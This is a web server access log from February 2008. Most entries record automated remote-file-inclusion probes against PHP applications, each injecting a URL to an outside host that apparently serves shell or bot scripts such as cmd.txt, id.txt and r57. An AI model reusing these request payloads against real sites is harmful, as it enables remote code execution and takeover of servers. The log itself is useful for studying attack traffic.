213.229.59.21 - - [22/Feb/2008:07:37:24 -0800] "GET /logs/access_080122.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:07:37:24 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:07:37:25 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:07:37:25 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:07:37:25 -0800] "GET /logs/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
18.55.2.206 - - [22/Feb/2008:07:37:46 -0800] "GET /index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://nybap.org/templates/rose.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
18.55.2.206 - - [22/Feb/2008:07:37:47 -0800] "GET /logs/index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://nybap.org/templates/rose.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
83.16.96.219 - - [22/Feb/2008:07:37:49 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [22/Feb/2008:07:37:50 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [22/Feb/2008:07:37:52 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.141.14 - - [22/Feb/2008:07:38:08 -0800] "GET /logs/access.log//index.php?pagina=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.141.14 - - [22/Feb/2008:07:38:08 -0800] "GET //index.php?pagina=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.141.14 - - [22/Feb/2008:07:38:08 -0800] "GET /logs//index.php?pagina=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.145.197 - - [22/Feb/2008:07:38:34 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.197 - - [22/Feb/2008:07:38:34 -0800] "GET /bikes/CreSTOC07/ HTTP/1.0" 200 15280 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
67.212.164.34 - - [22/Feb/2008:07:39:00 -0800] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [22/Feb/2008:07:39:06 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [22/Feb/2008:07:39:06 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.134.235.165 - - [22/Feb/2008:07:39:39 -0800] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [22/Feb/2008:07:39:40 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [22/Feb/2008:07:39:42 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.17.114.133 - - [22/Feb/2008:07:39:57 -0800] "GET /logs/access_080111.log/send_reminders.php?noSet=0&includedir=http://9ata.ch/a/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [22/Feb/2008:07:39:58 -0800] "GET /send_reminders.php?noSet=0&includedir=http://9ata.ch/a/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [22/Feb/2008:07:39:58 -0800] "GET /logs/send_reminders.php?noSet=0&includedir=http://9ata.ch/a/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [22/Feb/2008:07:40:01 -0800] "GET /logs/access_080103.log/send_reminders.php?noSet=0&includedir=http://9ata.ch/a/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.247.200 - - [22/Feb/2008:07:40:44 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.200 - - [22/Feb/2008:07:40:44 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.189.27.130 - - [22/Feb/2008:07:40:44 -0800] "GET //download.php?upload_filename=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.200 - - [22/Feb/2008:07:40:45 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.141.14 - - [22/Feb/2008:07:41:04 -0800] "GET /logs/access_080201.log//index.php?pagina=http://www.epiriler.com.tr/flash/safe.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.136 - - [22/Feb/2008:07:41:32 -0800] "GET /bikes/CreSTOC07/?D=A HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.27.146 - - [22/Feb/2008:07:41:47 -0800] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
74.52.27.146 - - [22/Feb/2008:07:41:49 -0800] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:07:42:32 -0800] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.229.59.21 - - [22/Feb/2008:07:42:33 -0800] "GET /logs/access_080103.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:07:42:43 -0800] "GET /logs/access_080211.log//class/class.dashboard_lms.php?where_framework=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:07:42:43 -0800] "GET /logs/access_080211.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:07:42:43 -0800] "GET //class/class.dashboard_lms.php?where_framework=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:07:42:44 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:07:42:44 -0800] "GET /logs//class/class.dashboard_lms.php?where_framework=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:07:42:44 -0800] "GET /logs/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.227.109.187 - - [22/Feb/2008:07:43:27 -0800] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.109.187 - - [22/Feb/2008:07:43:28 -0800] "GET //skin/zero_vote/error.php?dir=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.109.187 - - [22/Feb/2008:07:43:28 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.109.187 - - [22/Feb/2008:07:44:19 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.223.16.102 - - [22/Feb/2008:07:44:35 -0800] "GET //errors.php?error=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.54.45.2 - - [22/Feb/2008:07:44:36 -0800] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.45.2 - - [22/Feb/2008:07:44:36 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.45.2 - - [22/Feb/2008:07:44:36 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.108 - - [22/Feb/2008:07:44:41 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.96 - - [22/Feb/2008:07:44:42 -0800] "GET /logs/access_080211.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.160.222.81 - - [22/Feb/2008:07:45:01 -0800] "GET /logs/access_080201.log//index.php?module=search&q=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [22/Feb/2008:07:45:02 -0800] "GET //index.php?module=search&q=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [22/Feb/2008:07:45:02 -0800] "GET /logs//index.php?module=search&q=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.11.72 - - [22/Feb/2008:07:45:23 -0800] "GET //skin/zero_vote/error.php?dir=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [22/Feb/2008:07:45:33 -0800] "GET /send_reminders.php?noSet=0&includedir=http://9ata.ch/a/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [22/Feb/2008:07:45:43 -0800] "GET /index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.17.29.41 - - [22/Feb/2008:07:46:14 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
217.17.29.41 - - [22/Feb/2008:07:46:14 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
218.188.2.141 - - [22/Feb/2008:07:46:23 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.134.235.165 - - [22/Feb/2008:07:46:28 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [22/Feb/2008:07:46:29 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.134.235.165 - - [22/Feb/2008:07:46:30 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:07:46:55 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:07:46:55 -0800] "GET //skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:07:46:56 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.222.81 - - [22/Feb/2008:07:47:03 -0800] "GET /logs/access_071230.log//index.php?module=search&q=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.35.196.26 - - [22/Feb/2008:07:47:50 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.26 - - [22/Feb/2008:07:47:51 -0800] "GET //skin/zero_vote/error.php?dir=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.26 - - [22/Feb/2008:07:47:51 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.187.94.179 - - [22/Feb/2008:07:48:08 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.160.33.164 - - [22/Feb/2008:07:48:14 -0800] "GET /logs/scripts.log//download.php?upload_filename=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.33.164 - - [22/Feb/2008:07:48:14 -0800] "GET /logs//download.php?upload_filename=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.27.146 - - [22/Feb/2008:07:48:25 -0800] "GET /index.php?option=com_content&task=view&id=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
74.52.27.146 - - [22/Feb/2008:07:48:27 -0800] "GET /logs/index.php?option=com_content&task=view&id=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.72.221.130 - - [22/Feb/2008:07:48:49 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [22/Feb/2008:07:48:49 -0800] "GET //skin/zero_vote/error.php?dir=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [22/Feb/2008:07:48:49 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.160.11.72 - - [22/Feb/2008:07:49:12 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.11.72 - - [22/Feb/2008:07:49:13 -0800] "GET //skin/zero_vote/error.php?dir=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.11.72 - - [22/Feb/2008:07:49:14 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.27.146 - - [22/Feb/2008:07:49:24 -0800] "GET /index.php?option=com_comprofiler&task=lostPassword&lang=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
74.52.27.146 - - [22/Feb/2008:07:49:35 -0800] "GET /logs/index.php?option=com_comprofiler&task=lostPassword&lang=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
85.119.158.50 - - [22/Feb/2008:07:49:46 -0800] "GET /logs/scripts.log//download.php?upload_filename=http://66.153.86.221/www???????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [22/Feb/2008:07:49:47 -0800] "GET //download.php?upload_filename=http://66.153.86.221/www???????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [22/Feb/2008:07:49:47 -0800] "GET /logs//download.php?upload_filename=http://66.153.86.221/www???????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:07:50:09 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:07:50:56 -0800] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:07:50:57 -0800] "GET //skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.18 - - [22/Feb/2008:07:50:57 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.18 - - [22/Feb/2008:07:50:57 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:07:50:57 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.18 - - [22/Feb/2008:07:50:58 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.18 - - [22/Feb/2008:07:50:58 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.26 - - [22/Feb/2008:07:51:00 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.160.33.164 - - [22/Feb/2008:07:51:16 -0800] "GET /logs/access_080201.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.33.164 - - [22/Feb/2008:07:51:16 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.130 - - [22/Feb/2008:07:51:47 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:07:52:02 -0800] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:07:52:03 -0800] "GET //skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:07:52:03 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:52:13 -0800] "GET /logs/access_080126.log/include/Classes.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:52:13 -0800] "GET /logs/access_080126.log/include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:52:13 -0800] "GET /logs/access_080126.log/include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:52:14 -0800] "GET /include/Classes.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:52:14 -0800] "GET /include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:52:14 -0800] "GET /include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:52:14 -0800] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:52:14 -0800] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:52:14 -0800] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.18 - - [22/Feb/2008:07:52:20 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.21.56.114 - - [22/Feb/2008:07:52:29 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/kambe2/nyari/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.21.56.114 - - [22/Feb/2008:07:52:29 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/kambe2/nyari/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.21.56.114 - - [22/Feb/2008:07:52:29 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/kambe2/nyari/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:07:53:14 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.35.229.7 - - [22/Feb/2008:07:54:01 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.35.229.7 - - [22/Feb/2008:07:54:02 -0800] "GET //skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.35.229.7 - - [22/Feb/2008:07:54:02 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.35.229.7 - - [22/Feb/2008:07:54:26 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:07:54:29 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
